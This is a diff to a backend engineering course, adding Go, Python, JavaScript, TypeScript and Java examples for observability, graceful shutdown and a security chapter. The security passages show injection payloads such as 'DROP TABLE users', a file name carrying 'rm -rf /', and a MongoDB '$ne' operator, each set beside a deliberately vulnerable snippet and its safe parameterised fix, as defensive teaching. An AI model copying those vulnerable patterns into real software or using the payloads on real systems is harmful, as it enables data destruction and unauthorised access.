+```java title="TodoService.java / Java 17+ + SLF4J + OTel"
+// TodoService.java, the full LMO pattern per method
+@Service
+public class TodoService {
+    private static final Logger log = LoggerFactory.getLogger(TodoService.class);
+    private final Tracer tracer = GlobalOpenTelemetry.getTracer("todo-service");
+
+    public Todo createTodo(CreateTodoRequest req, String userId) {
+        // 1. Start a child span (the parent is the current Context)
+        Span span = tracer.spanBuilder("TodoService.createTodo").startSpan();
+
+        // 2. Add business context to the span, visible in trace UI
+        span.setAttribute("user.id", userId);
+        span.setAttribute("todo.title", req.title());
+        span.setAttribute("todo.priority", req.priority());
+
+        // makeCurrent() is what makes the NEXT span a child of this one.
+        // Forget it and the trace flattens into a list of orphan spans
+        // that no longer tells you what called what.
+        try (Scope scope = span.makeCurrent()) {
+            // 3. INFO log, record business event start
+            log.info("creating todo user_id={} title={}", userId, req.title());
+
+            // 4. Execute DB operation (its own child span, auto-instrumented)
+            Todo todo = repo.createTodo(req, userId);
+
+            // 5. DEBUG log, only visible in dev, suppressed in production
+            log.debug("todo created todo_id={}", todo.id());
+
+            // 6. INFO, business event completion log (for audit trail)
+            log.info("todo created successfully todo_id={} user_id={} title={} priority={}",
+                todo.id(), userId, todo.title(), todo.priority());
+
+            return todo;
+
+        } catch (RuntimeException e) {
+            // ERROR log with full context. The exception goes LAST and
+            // without a placeholder: that is the SLF4J signature that
+            // logs the full stack trace rather than just its toString.
+            log.error("failed to create todo user_id={}", userId, e);
+
+            // Record error on span, shows as failed in Jaeger / Tempo
+            span.recordException(e);
+            span.setStatus(StatusCode.ERROR, e.getMessage());
+            throw e;
+
+        } finally {
+            span.end(); // ALWAYS, or the span leaks and never reaches the collector
+        }
+    }
+}
 ```
 
 ### Prometheus Middleware (Metrics)
 
-```go
+Go Python JavaScript TypeScript Java
+
+count and time every request, labelled by the route TEMPLATE
+
+```go title="middleware/metrics.go / Go + Gin + Prometheus"
 // middleware/metrics.go, HTTP metrics instrumentation
 package middleware
 
@@ -630,127 +1290,162 @@ func PrometheusMetrics() gin.HandlerFunc {
         httpDuration.WithLabelValues(c.Request.Method, c.FullPath()).Observe(duration.Seconds())
     }
 }
-Go / Gin + Prometheus
 ```
 
-12
+```python title="middleware/metrics.py / Python + FastAPI + prometheus_client"
+# middleware/metrics.py, HTTP metrics instrumentation
+import time
 
-## Code: Python: Full LMO Implementation
+from fastapi import Request
+from prometheus_client import Counter, Histogram, make_asgi_app
 
-### Structured Logging with structlog
+http_requests_total = Counter(
+    "http_requests_total",
+    "Total HTTP requests",
+    ["method", "path", "status"],
+)
 
-```python
-# logging_config.py, structlog setup for Python
-import logging
-import os
-import structlog
+http_duration = Histogram(
+    "http_request_duration_seconds",
+    "HTTP request latency",
+    ["method", "path"],
+    buckets=(.005, .01, .025, .05, .1, .25, .5, 1, 2.5, 5),
+)
 
-def configure_logging():
-    env = os.getenv("APP_ENV", "development")
 
-    if env == "production":
-        # JSON renderer for production, parseable by Loki / ELK
-        renderer = structlog.processors.JSONRenderer()
-        level = logging.INFO
-    else:
-        # ColourfulConsole for local dev, human-readable
-        renderer = structlog.dev.ConsoleRenderer(colors=True)
-        level = logging.DEBUG
+@app.middleware("http")
+async def prometheus_metrics(request: Request, call_next):
+    start = time.perf_counter()
+    response = await call_next(request)
+    duration = time.perf_counter() - start
 
-    structlog.configure(
-        processors=[
-            structlog.contextvars.merge_contextvars,      # merge request-scoped context
-            structlog.processors.TimeStamper(fmt="iso"),
-            structlog.stdlib.add_log_level,
-            structlog.stdlib.add_logger_name,
-            structlog.processors.StackInfoRenderer(),
-            structlog.processors.ExceptionRenderer(),     # auto-renders exceptions
-            renderer,
-        ],
-        logger_factory=structlog.stdlib.LoggerFactory(),
-        wrapper_class=structlog.stdlib.BoundLogger,
-        cache_logger_on_first_use=True,
-    )
+    # The route TEMPLATE ("/todos/{id}"), never request.url.path. The raw
+    # path would mint one time series per todo id, and THAT is what takes
+    # a Prometheus server down, not the request volume.
+    route = request.scope.get("route")
+    path = route.path if route else "unmatched"
 
-    logging.basicConfig(level=level)
+    http_requests_total.labels(request.method, path, response.status_code).inc()
+    http_duration.labels(request.method, path).observe(duration)
+    return response
 
-log = structlog.get_logger()
-Python / structlog
+
+# Expose /metrics for Prometheus to scrape
+app.mount("/metrics", make_asgi_app())
 ```
 
-### OpenTelemetry Tracing in FastAPI
+```js title="middleware/metrics.js / Node 20+ + Express + prom-client"
+// middleware/metrics.js, HTTP metrics instrumentation
+import { Counter, Histogram, register } from 'prom-client'
 
-```python
-# tracing.py, OTel setup for FastAPI
-from opentelemetry import trace
-from opentelemetry.sdk.trace import TracerProvider
-from opentelemetry.sdk.trace.export import BatchSpanProcessor
-from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter
-from opentelemetry.instrumentation.fastapi import FastAPIInstrumentor
-from opentelemetry.instrumentation.sqlalchemy import SQLAlchemyInstrumentor
+const httpRequestsTotal = new Counter({
+  name: 'http_requests_total',
+  help: 'Total HTTP requests',
+  labelNames: ['method', 'path', 'status'],
+})
 
-def setup_tracing(app):
-    # Tracer provider, sends spans to OTel Collector via gRPC
-    provider = TracerProvider()
-    exporter = OTLPSpanExporter(endpoint="http://otel-collector:4317")
-    provider.add_span_processor(BatchSpanProcessor(exporter))
-    trace.set_tracer_provider(provider)
+const httpDuration = new Histogram({
+  name: 'http_request_duration_seconds',
+  help: 'HTTP request latency',
+  labelNames: ['method', 'path'],
+  buckets: [0.005, 0.01, 0.025, 0.05, 0.1, 0.25, 0.5, 1, 2.5, 5],
+})
 
-    # Auto-instrument FastAPI, all routes get spans automatically
-    FastAPIInstrumentor.instrument_app(app)
+export function prometheusMetrics(req, res, next) {
+  const end = httpDuration.startTimer()
 
-    # Auto-instrument SQLAlchemy, all DB queries get spans automatically
-    SQLAlchemyInstrumentor().instrument(engine=engine)
+  res.on('finish', () => {
+    // req.route.path is the TEMPLATE ("/todos/:id"). req.path is the real
+    // url and would create one time series per todo id.
+    const path = req.route?.path ?? 'unmatched'
+    end({ method: req.method, path })
+    httpRequestsTotal.inc({ method: req.method, path, status: res.statusCode })
+  })
 
-# main.py, wire it all up
-from fastapi import FastAPI
-from tracing import setup_tracing
-from logging_config import configure_logging, log
+  next()
+}
 
-configure_logging()
-app = FastAPI()
-setup_tracing(app)
-Python / FastAPI + OTel
+// Expose /metrics for Prometheus to scrape
+app.get('/metrics', async (_req, res) => {
+  res.set('Content-Type', register.contentType)
+  res.end(await register.metrics())
+})
 ```
 
-### Service Layer with Full LMO Pattern
+```ts title="middleware/metrics.ts / TypeScript 5+ + Express + prom-client"
+import { Counter, Histogram, register } from 'prom-client'
+import type { NextFunction, Request, Response } from 'express'
 
-```python
-# services/todo_service.py
-from opentelemetry import trace
-import structlog
+// Naming the label set as a type is worth the three lines. Prometheus
+// costs one time series per distinct label COMBINATION, so the danger is
+// never the metric, it is somebody adding `user_id` to this object in six
+// months. A closed type makes that a compile error.
+type HttpLabels = { method: string; path: string; status?: number }
 
-tracer = trace.get_tracer("todo-service")
-log = structlog.get_logger()
+const httpRequestsTotal = new Counter<keyof HttpLabels>({
+  name: 'http_requests_total',
+  help: 'Total HTTP requests',
+  labelNames: ['method', 'path', 'status'],
+})
 
-async def create_todo(user_id: str, req: CreateTodoRequest) -> Todo:
-    # 1. Start child span
-    with tracer.start_as_current_span("TodoService.create_todo") as span:
-        span.set_attribute("user.id", user_id)
-        span.set_attribute("todo.title", req.title)
+const httpDuration = new Histogram<keyof HttpLabels>({
+  name: 'http_request_duration_seconds',
+  help: 'HTTP request latency',
+  labelNames: ['method', 'path'],
+  buckets: [0.005, 0.01, 0.025, 0.05, 0.1, 0.25, 0.5, 1, 2.5, 5],
+})
 
-        # 2. INFO log, business event start
-        log.info("creating_todo", user_id=user_id, title=req.title)
+export function prometheusMetrics(req: Request, res: Response, next: NextFunction): void {
+  const end = httpDuration.startTimer()
 
-        try:
-            todo = await repo.create_todo(user_id, req)
+  res.on('finish', () => {
+    const labels: HttpLabels = { method: req.method, path: req.route?.path ?? 'unmatched' }
+    end(labels)
+    httpRequestsTotal.inc({ ...labels, status: res.statusCode })
+  })
 
-            # 3. Business event log, audit trail
-            log.info("todo_created",
-                todo_id=todo.id,
-                user_id=user_id,
-                title=todo.title,
-                priority=todo.priority,
-            )
-            return todo
+  next()
+}
+```
 
-        except Exception as e:
-            # 4. ERROR log + span error recording
-            log.error("todo_creation_failed", user_id=user_id, error=str(e))
-            span.record_exception(e)
-            span.set_status(trace.StatusCode.ERROR, str(e))
-            raise
-Python / FastAPI + OTel + structlog
+```java title="TodoMetrics.java / Java 17+ + Spring Boot + Micrometer"
+// Spring Boot gives you the HTTP metrics for free. Add
+// spring-boot-starter-actuator + micrometer-registry-prometheus and every
+// controller is counted and timed as http_server_requests_seconds,
+// tagged by method, status, and the uri TEMPLATE:
+//
+//   management.endpoints.web.exposure.include: prometheus
+//   management.metrics.tags.service: todo-api
+//
+// The uri tag uses "/todos/{id}", never the actual path. That is not an
+// accident: tagging by raw path mints one time series per id, which is
+// the classic way to take a Prometheus server down.
+
+// What no framework can know is your BUSINESS metrics, so write those.
+@Component
+public class TodoMetrics {
+    private final Counter created;
+    private final Timer dbWrite;
+
+    TodoMetrics(MeterRegistry registry) {
+        this.created = Counter.builder("todos_created_total")
+            .description("Todos successfully created")
+            .register(registry);
+
+        this.dbWrite = Timer.builder("todo_db_write_seconds")
+            .description("Time spent writing a todo")
+            .publishPercentileHistogram() // the histogram buckets
+            .register(registry);
+    }
+
+    public void recordCreated() {
+        created.increment();
+    }
+
+    public <T> T timeDbWrite(Supplier<T> work) {
+        return dbWrite.record(work); // times both the happy and throwing paths
+    }
+}
 ```
 
 13
@@ -789,9 +1484,13 @@ If you don't have the team to manage the open-source stack, proprietary all-in-o
 | **Sentry**    | Best-in-class error tracking. Groups identical errors, shows stack traces, user context, release tracking. | Error monitoring specifically, pairs well with Grafana for metrics | Free tier (5k errors/month), then per event   |
 | **Honeycomb** | High-cardinality event querying. Built for observability-first teams. Native OTel support.                 | Teams doing advanced distributed tracing, many microservices       | Per event ingested                            |
 
-### New Relic Go Agent: Quick Integration
+### New Relic Agent: Quick Integration
 
-```go
+Go Python JavaScript TypeScript Java
+
+one agent, auto-instrumented routes, no per-handler code
+
+```go title="main.go / Go + New Relic go-agent"
 // main.go, New Relic agent setup in Go
 import (
     "github.com/newrelic/go-agent/v3/newrelic"
@@ -813,11 +1512,138 @@ func main() {
 
     r.Run(":8080")
 }
-Go / New Relic
+```
+
+```python title="main.py / Python + newrelic agent"
+# Python's agent is mostly configuration, not code. Install it, point it
+# at a config file, and start the app THROUGH the admin wrapper:
+#
+#   pip install newrelic
+#   newrelic-admin generate-config $NEW_RELIC_LICENSE_KEY newrelic.ini
+#   NEW_RELIC_CONFIG_FILE=newrelic.ini newrelic-admin run-program \
+#       uvicorn main:app --host 0.0.0.0 --port 8000
+
+# newrelic.ini
+#   [newrelic]
+#   app_name = todo-api
+#   application_logging_forwarding_enabled = true   ; forward logs to NR
+#   distributed_tracing.enabled = true              ; enable distributed tracing
+
+# Or initialise in-process, which keeps the wrapper out of your Dockerfile:
+import newrelic.agent
+
+newrelic.agent.initialize("newrelic.ini")  # MUST run before importing the app
+
+from fastapi import FastAPI
+
+app = FastAPI()
+# The agent auto-instruments FastAPI, SQLAlchemy, redis and httpx by
+# monkey-patching them on import, which is why initialise must come first.
+
+
+# Only custom business spans need writing by hand:
+@newrelic.agent.function_trace()
+async def create_todo(user_id: str, req: CreateTodoRequest) -> Todo:
+    ...
+```
+
+```js title="server.js / Node 20+ + newrelic"
+// The Node agent instruments by patching modules as they load, so it has
+// to be the VERY first thing the process imports, before express or pg.
+//   node --import newrelic/esm-loader.mjs server.js
+// or, for CommonJS, literally the first line of the entry file:
+//   require('newrelic')
+
+// newrelic.cjs, config lives beside the entry point
+exports.config = {
+  app_name: ['todo-api'],
+  license_key: process.env.NEW_RELIC_LICENSE_KEY,
+  application_logging: {
+    forwarding: { enabled: true }, // forward logs to NR
+  },
+  distributed_tracing: { enabled: true }, // enable distributed tracing
+}
+
+// server.js
+import 'newrelic' // first import, always
+import express from 'express'
+
+const app = express()
+// Every route is now auto-instrumented as an NR transaction; there is no
+// middleware to add. Only custom segments are written by hand:
+import newrelic from 'newrelic'
+
+app.get('/todos/:id', async (req, res) => {
+  const todo = await newrelic.startSegment('repo.findTodo', true, () =>
+    repo.findTodo(req.params.id))
+  res.json(todo)
+})
+```
+
+```ts title="server.ts / TypeScript 5+ + newrelic"
+import 'newrelic' // first import, before express and pg are loaded
+import newrelic from 'newrelic'
+import express from 'express'
+
+// Worth knowing before you reach for a vendor agent in a TypeScript
+// codebase: the agent patches modules at load time, which no type
+// system can see. A mis-ordered import type-checks perfectly and
+// instruments nothing, so keep the bare `import 'newrelic'` on line one
+// and configure the entry point with `--import`, never a lazy import.
+
+const app = express()
+
+// Custom segments are the only hand-written part, and they are generic,
+// so the return type of the wrapped work survives the wrapper.
+async function findTodo(id: string): Promise<Todo> {
+  return newrelic.startSegment('repo.findTodo', true, () => repo.findTodo(id))
+}
+
+app.get('/todos/:id', async (req, res) => {
+  res.json(await findTodo(req.params.id))
+})
+
+// Prefer OTel + a collector if you may ever change vendor. New Relic,
+// Datadog and Honeycomb all ingest OTLP, so the instrumentation in the
+// sections above ports between them; a vendor agent does not.
+```
+
+```java title="build.gradle + JVM flag / Java 17+ + New Relic"
+// The Java agent is a JVM-level attachment: no dependency, no code, and
+// nothing to import. You download newrelic.jar and hand it to the JVM:
+//
+//   java -javaagent:/opt/newrelic/newrelic.jar -jar todo-api.jar
+//
+// newrelic.yml
+//   common: &default_settings
+//     app_name: todo-api
+//     license_key: ${NEW_RELIC_LICENSE_KEY}
+//     application_logging:
+//       forwarding:
+//         enabled: true            # forward logs to NR
+//     distributed_tracing:
+//       enabled: true              # enable distributed tracing
+
+// Bytecode instrumentation means every Spring controller, JDBC query and
+// HTTP client call is traced without a single annotation. Only custom
+// business spans are written by hand:
+@Service
+public class TodoService {
+
+    @Trace(dispatcher = true) // com.newrelic.api.agent.Trace
+    public Todo createTodo(CreateTodoRequest req, String userId) {
+        NewRelic.addCustomParameter("user.id", userId);
+        return repo.createTodo(req, userId);
+    }
+}
+
+// Same caveat as everywhere else in this section: the OTel instrumentation
+// above is vendor-neutral and New Relic ingests OTLP directly. Reach for
+// the agent when you want zero-code coverage, not as the default.
 ```
 
 <Callout type="info" title="What New Relic shows you">
-After adding the middleware, New Relic automatically captures: transaction time per route, error rate, throughput (req/sec), Apdex score, Go runtime metrics (GC pause, goroutine count, memory), and distributed traces. The dashboard shows all of this within minutes of deploying.
+Once the agent is attached, New Relic automatically captures: transaction time per route, error rate, throughput (req/sec), Apdex score, runtime metrics for the language it is running in (Go GC pause and goroutine count, JVM heap and GC, Node event-loop lag, Python GC), and distributed traces. The dashboard shows all of this within minutes of deploying.
 </Callout>
 
 15
@@ -925,7 +1751,6 @@ groups:
           severity: critical
         annotations:
           summary: "todo-api service is unreachable"
-YAML / Prometheus Rules
 ```
 
 <Callout type="info" title="Alert Severity Levels">
@@ -1017,4 +1842,4 @@ Start with basic structured logging in JSON format + a simple Prometheus counter
 **Logs** tell you what happened. **Metrics** tell you patterns and trends. **Traces** tell you where exactly things went wrong and how long each step took. A system is _observable_ when all three are in place and correlated. This requires developer effort (instrument your code) and infrastructure effort (collect, store, display) working together. The tooling, whether Grafana stack or New Relic, is secondary to the practice of consistently instrumenting your code with the right context.
 </Callout>
 
-Backend from First Principles / Chapter 15 / Observability. Code targets Go 1.22+ and Python 3.11+.
+Backend from First Principles / Chapter 15 / Observability. Code targets Go 1.22+, Python 3.11+, Node.js 20+, TypeScript 5+ and Java 17+ (Spring Boot).

--- a/src/content/chapters/16-graceful-shutdown.mdx
+++ b/src/content/chapters/16-graceful-shutdown.mdx
@@ -319,11 +319,15 @@ For example, say you established a Redis connection, then a DB connection, then 
 
 ## Code Examples
 
-We typically avoid looking at code in this series, but a practical example helps avoid a hollow understanding. You don't have to understand every line, just follow the narrative. In practice, most frameworks (Node.js, Go, Rust, Python) provide this code ready to copy-paste; what matters is understanding _what happens_ and _why_.
+We typically avoid looking at code in this series, but a practical example helps avoid a hollow understanding. You don't have to understand every line, just follow the narrative. In practice, most frameworks (Node.js, Go, Rust, Python, Spring) provide this code ready to copy-paste; what matters is understanding _what happens_ and _why_. The five tabs below do the identical four things in the identical order, and only the syntax changes: register a handler for SIGINT and SIGTERM, block until one arrives, drain in-flight requests under a hard deadline, then release resources in reverse order of acquisition.
 
-### 7.1: Graceful Shutdown in Go
+### 7.1: Graceful Shutdown
 
-This mirrors the live demo from the lecture: register a handler waiting for signals, then on receipt run the shutdown function which closes the HTTP server, then the database, then the Redis-backed background job server, in reverse order of acquisition.
+This mirrors the live demo from the lecture: register a handler waiting for signals, then on receipt run the shutdown function which closes the HTTP server, then the background job worker, then the database, in reverse order of acquisition.
+
+Go Python JavaScript TypeScript Java
+
+catch the signal, drain, release in reverse
 
 ```go title="main.go / Go / net/http + signal.NotifyContext"
 package main
@@ -404,10 +408,6 @@ func gracefulShutdown(
 }
 ```
 
-### 7.2: Graceful Shutdown in Python
-
-The same concepts in Python using the `signal` module: register handlers for SIGINT and SIGTERM, drain in-flight work, then release resources in reverse.
-
 ```python title="server.py / Python / signal + asyncio"
 import asyncio
 import signal
@@ -474,6 +474,178 @@ if __name__ == "__main__":
     asyncio.run(main())
 ```
 
+```js title="server.js / Node 20+ + Express"
+import express from 'express'
+
+const SHUTDOWN_TIMEOUT = 30_000 // hard limit in ms
+
+// --- Startup phase: acquire resources in order ---
+const db = await connectDatabase()      // 1. acquire DB (TCP pool)
+const jobs = await startBackgroundJobs() // 2. acquire Redis-backed worker
+
+const app = express()
+const server = app.listen(8080, () =>
+  console.log('server started, ready to accept requests'))
+
+let shuttingDown = false
+
+async function gracefulShutdown(signal) {
+  // A second Ctrl+C while draining must not restart the sequence.
+  if (shuttingDown) return
+  shuttingDown = true
+  console.log(`signal received: ${signal}, starting graceful shutdown`)
+
+  // Hard limit: if draining hangs, exit anyway. Without this the process
+  // sits forever on one keep-alive connection and the orchestrator ends
+  // up SIGKILLing it, which is the exact outcome we are avoiding.
+  const forceExit = setTimeout(() => {
+    console.warn('timeout exceeded, forcing shutdown')
+    process.exit(1)
+  }, SHUTDOWN_TIMEOUT)
+  forceExit.unref() // do not keep the loop alive just for this timer
+
+  // 1. CONNECTION DRAINING: stop accepting NEW connections, and let
+  //    in-flight requests finish. The callback fires when the last one has.
+  await new Promise((resolve) => server.close(resolve))
+  console.log('HTTP connections drained')
+
+  // 2 & 3. Release in REVERSE order of acquisition.
+  console.log('stopping background job server...')
+  await jobs.shutdown()
+  console.log('closing database connection...')
+  await db.end()
+
+  clearTimeout(forceExit)
+  console.log('server exited properly')
+  process.exit(0)
+}
+
+// Handle BOTH the same way: the intention is identical.
+process.on('SIGINT', () => gracefulShutdown('SIGINT'))   // Ctrl+C, dev
+process.on('SIGTERM', () => gracefulShutdown('SIGTERM')) // PM2 / k8s, prod
+
+// Node caveat worth knowing: server.close() waits for idle KEEP-ALIVE
+// sockets too. Set `server.closeIdleConnections()` (Node 18.2+) right
+// after, or a browser tab holding an idle connection blocks the drain.
+```
+
+```ts title="server.ts / TypeScript 5+ + Express"
+import express from 'express'
+import type { Server } from 'node:http'
+
+const SHUTDOWN_TIMEOUT = 30_000 // hard limit in ms
+
+// Naming the contract every resource must satisfy is what makes the
+// reverse-order rule enforceable rather than a comment somebody has to
+// remember. Push in acquisition order, release by walking backwards.
+interface Closeable {
+  name: string
+  close: () => Promise<void>
+}
+
+const acquired: Closeable[] = []
+
+const db = await connectDatabase()
+acquired.push({ name: 'database', close: () => db.end() })       // 1
+
+const jobs = await startBackgroundJobs()
+acquired.push({ name: 'job server', close: () => jobs.shutdown() }) // 2
+
+const app = express()
+const server: Server = app.listen(8080, () =>
+  console.log('server started, ready to accept requests'))
+
+let shuttingDown = false
+
+async function gracefulShutdown(signal: NodeJS.Signals): Promise<void> {
+  if (shuttingDown) return // a second Ctrl+C must not restart the sequence
+  shuttingDown = true
+  console.log(`signal received: ${signal}, starting graceful shutdown`)
+
+  const forceExit = setTimeout(() => {
+    console.warn('timeout exceeded, forcing shutdown')
+    process.exit(1)
+  }, SHUTDOWN_TIMEOUT)
+  forceExit.unref()
+
+  // 1. CONNECTION DRAINING
+  console.log('draining HTTP connections...')
+  await new Promise<void>((resolve) => server.close(() => resolve()))
+  server.closeIdleConnections() // idle keep-alives would otherwise block
+
+  // 2 & 3. REVERSE order of acquisition, by construction
+  for (const resource of acquired.reverse()) {
+    console.log(`closing ${resource.name}...`)
+    await resource.close()
+  }
+
+  clearTimeout(forceExit)
+  console.log('server exited properly')
+  process.exit(0)
+}
+
+process.on('SIGINT', () => void gracefulShutdown('SIGINT'))
+process.on('SIGTERM', () => void gracefulShutdown('SIGTERM'))
+```
+
+```java title="Application.java / Java 17+ + Spring Boot"
+// Spring Boot does almost all of this for you, and the important part is
+// knowing WHICH parts, so you only write what is missing.
+//
+// application.yml:
+//   server.shutdown: graceful          # drain instead of cutting off
+//   spring.lifecycle.timeout-per-shutdown-phase: 30s   # the hard limit
+//
+// With those two lines, SIGTERM makes Tomcat stop accepting new
+// connections and wait for in-flight requests, exactly like srv.Shutdown.
+
+@SpringBootApplication
+public class Application {
+    public static void main(String[] args) {
+        SpringApplication.run(Application.class, args);
+    }
+}
+
+// Resource cleanup is @PreDestroy, and Spring already calls it in REVERSE
+// dependency order: a bean is destroyed before the beans it depends on.
+// That is the reverse-order-of-acquisition rule, enforced by the container
+// rather than by a shutdown function you have to keep in sync.
+@Component
+class JobServer {
+    @PreDestroy
+    void shutdown() {
+        log.info("stopping background job server...");
+        // closes Redis connections, waits for workers to finish current jobs
+    }
+}
+
+@Component
+class Database implements AutoCloseable {
+    @Override
+    @PreDestroy
+    public void close() {
+        log.info("closing database connection...");
+        // commit or rollback open transactions, then close the pool
+    }
+}
+
+// The one thing to add by hand is the pre-drain pause, and it matters
+// more than the rest: a load balancer needs a few seconds to notice this
+// instance is going away, and requests routed in during that window are
+// dropped no matter how gracefully the app shuts down afterwards.
+@Component
+class DrainDelay implements ApplicationListener<ContextClosedEvent> {
+    @Override
+    public void onApplicationEvent(ContextClosedEvent event) {
+        try {
+            Thread.sleep(5_000); // let the LB deregister us first
+        } catch (InterruptedException e) {
+            Thread.currentThread().interrupt();
+        }
+    }
+}
+```
+
 ## Further Reading & Documentation
 
 #### Unix Signals
@@ -507,6 +679,6 @@ if __name__ == "__main__":
 </Callout>
 
 BACKEND ENGINEERING FIELD MANUAL / V2 / CHAPTER 14 / GRACEFUL SHUTDOWN\
-Notes compiled from lecture transcript / Go + Python examples / Unix signals & orchestration references inline
+Notes compiled from lecture transcript / Go, Python, JavaScript, TypeScript & Java examples / Unix signals & orchestration references inline
 
-Backend from First Principles / Chapter 16 / Shutdown. Code targets Go 1.22+ and Python 3.11+.
+Backend from First Principles / Chapter 16 / Shutdown. Code targets Go 1.22+, Python 3.11+, Node.js 20+, TypeScript 5+ and Java 17+ (Spring Boot).

--- a/src/content/chapters/17-backend-security.mdx
+++ b/src/content/chapters/17-backend-security.mdx
@@ -2,7 +2,7 @@
 order: 17
 title: "Backend Security"
 navTitle: "Backend Security"
-summary: "Chapter 17 of Backend from First Principles: Backend Security."
+summary: "Almost every attack is the same mistake: data from a user being treated as code or as trusted. Injection, password storage, session cookies, rate limiting, BOLA and BFLA, XSS and CSRF, security headers, OAuth/OIDC and TLS, each one built from the attack backwards. Worked implementations in Go, Python, JavaScript, TypeScript and Java."
 readingTime: "2-3 hours"
 keywords:
   - "security"
@@ -86,8 +86,8 @@ SQL injection has been the #1 most destructive vulnerability for decades. It wor
 
 Consider a login query built by concatenation:
 
-```sql
-SQL / Vulnerable (Never Do This)-- Template on server:
+```sql title="Vulnerable, never do this"
+-- Template on server:
 SELECT * FROM users WHERE email = '' + userInput + ''
 
 -- Happy path (Alice logs in normally):
@@ -121,8 +121,12 @@ SELECT * FROM users WHERE email = ''; DROP TABLE users; --'
 
 Instead of building one string with everything mashed together, send **two separate things** to the database: (1) the query template with placeholder slots, (2) the user data as separate arguments. The database driver guarantees that whatever goes into a slot is treated as a pure string, never as executable SQL.
 
-```go
-Go / pgx parameterised query//NEVER, string concatenation
+Go Python JavaScript TypeScript Java
+
+the value travels beside the query, never inside it
+
+```go title="pgx parameterised query"
+//NEVER, string concatenation
 query := "SELECT * FROM users WHERE email = '" + userInput + "'"
 
 // ALWAYS, parameterised ($1 is the slot)
@@ -133,6 +137,79 @@ row := db.QueryRow(ctx,
 
 // With an ORM (GORM), parameterised automatically
 db.Where("email = ?", userInput).First(&user)
+```
+
+```python title="psycopg parameterised query"
+# NEVER, f-string interpolation
+query = f"SELECT * FROM users WHERE email = '{user_input}'"
+
+# ALWAYS, parameterised (%s is the SLOT, not Python formatting)
+cur.execute(
+    "SELECT id, name FROM users WHERE email = %s",
+    (user_input,),  # a TUPLE; the driver escapes it, injection is impossible
+)
+
+# The trailing comma matters: ("x") is a string, ("x",) is a one-tuple.
+# Forget it and psycopg raises, which is the good outcome.
+
+# With an ORM (SQLAlchemy), parameterised automatically
+session.query(User).filter(User.email == user_input).first()
+```
+
+```js title="node-postgres parameterised query"
+// NEVER, template literal. This is THE JavaScript version of the
+// mistake, and it is four characters away from the safe line below.
+const query = `SELECT * FROM users WHERE email = '${userInput}'`
+
+// ALWAYS, parameterised ($1 is the slot, values go in the array)
+const { rows } = await db.query(
+  'SELECT id, name FROM users WHERE email = $1',
+  [userInput], // passed separately, treated purely as data
+)
+
+// With an ORM (Prisma), parameterised automatically
+await prisma.user.findFirst({ where: { email: userInput } })
+```
+
+```ts title="node-postgres parameterised query"
+// TypeScript does not stop the injection on its own, and it is worth
+// being clear about that: both lines below type-check perfectly.
+const bad = `SELECT * FROM users WHERE email = '${userInput}'` // still a hole
+
+// What it CAN do is make the safe path the only ergonomic one. A tagged
+// template collects the interpolations as PARAMETERS rather than
+// splicing them into the string, so the natural-looking syntax is the
+// safe one. `sql` here is from a library such as postgres.js or slonik.
+const rows = await sql<User[]>`
+  SELECT id, name FROM users WHERE email = ${userInput}
+`
+// -> sent as: SELECT id, name FROM users WHERE email = $1, [userInput]
+
+// Plain pg, typed by the row shape rather than the query text:
+const { rows } = await db.query<User>(
+  'SELECT id, name FROM users WHERE email = $1',
+  [userInput],
+)
+```
+
+```java title="JdbcClient parameterised query"
+// NEVER, string concatenation
+String query = "SELECT * FROM users WHERE email = '" + userInput + "'";
+
+// ALWAYS, parameterised (? is the slot)
+Optional<User> user = db.sql("SELECT id, name FROM users WHERE email = ?")
+    .param(userInput) // passed separately, treated purely as data
+    .query(User.class)
+    .optional();
+
+// JPA: a NAMED parameter, same rule
+em.createQuery("SELECT u FROM User u WHERE u.email = :email", User.class)
+  .setParameter("email", userInput)
+  .getSingleResult();
+
+// The Java-specific trap: String.format looks tidier than concatenation
+// and is exactly as dangerous. There is no formatting that escapes SQL.
+//   String.format("SELECT * FROM users WHERE email = '%s'", userInput)
 ```
 
 <Callout type="info">
@@ -147,8 +224,8 @@ Even if a SQL injection succeeds, you can limit the blast radius. The database u
 
 MongoDB queries are JSON objects, not SQL strings. But they support _operators_ (prefixed with `$`) like `$ne` (not equal), `$gt`, `$exists`. If you pass raw user-supplied JSON directly to a query, an attacker can inject these operators:
 
-```text
-JavaScript / MongoDB Injection//VULNERABLE: attacker sends {"$ne": null} as email
+```js title="MongoDB injection"
+//VULNERABLE: attacker sends {"$ne": null} as email
 db.users.find({ email: req.body.email })
 // Becomes: { email: { $ne: null } }  -> returns ALL users
 
@@ -167,8 +244,8 @@ Command injection is SQL injection at the OS level. Your backend sometimes needs
 
 ### The Attack
 
-```text
-Shell / Vulnerable Image Resize# User supplies the output filename. Attacker sends: "out.jpg; rm -rf /"
+```bash title="vulnerable image resize"
+# User supplies the output filename. Attacker sends: "out.jpg; rm -rf /"
 ffmpeg -i input.jpg -vf scale=800:600 out.jpg; rm -rf /
 #                                       ^ ffmpeg done  ^ now this runs
 
@@ -191,8 +268,12 @@ Shell special characters that enable this:
 
 Every language provides functions that accept the _command_ and _arguments_ as separate parameters. These pass arguments directly to the process without going through a shell interpreter, so special characters are never interpreted.
 
-```go
-Go / exec.Command (safe)import "os/exec"
+Go Python JavaScript TypeScript Java
+
+the command and its arguments are separate values, so no shell parses them
+
+```go title="exec.Command, safe"
+import "os/exec"
 
 //VULNERABLE, passes through shell interpreter
 cmd := exec.Command("sh", "-c", "ffmpeg -i input.jpg -o "+userFilename)
@@ -208,8 +289,8 @@ cmd := exec.Command(
 output, err := cmd.Output()
 ```
 
-```text
-Python / subprocess (safe)import subprocess
+```python title="subprocess, safe"
+import subprocess
 
 #VULNERABLE, shell=True sends everything through sh
 subprocess.run(f"ffmpeg -i input.jpg -o {user_filename}", shell=True)
@@ -220,6 +301,76 @@ subprocess.run([
     "-vf", "scale=800:600",
     user_filename   # just a string, not interpreted
 ], check=True)
+```
+
+```js title="execFile, safe"
+import { execFile } from 'node:child_process'
+import { promisify } from 'node:util'
+
+// VULNERABLE: exec() runs the string through /bin/sh
+import { exec } from 'node:child_process'
+exec(`ffmpeg -i input.jpg -o ${userFilename}`)
+
+// SAFE: execFile takes the program and an ARRAY of arguments.
+// No shell is spawned, so ; && $() and friends have no meaning.
+await promisify(execFile)('ffmpeg', [
+  '-i', 'input.jpg',
+  '-vf', 'scale=800:600',
+  userFilename, // treated as one argument, not shell code
+])
+
+// spawn() is the same rule. The one thing to never do is pass
+// `{ shell: true }`, which puts the shell right back in the path.
+```
+
+```ts title="execFile, safe"
+import { execFile } from 'node:child_process'
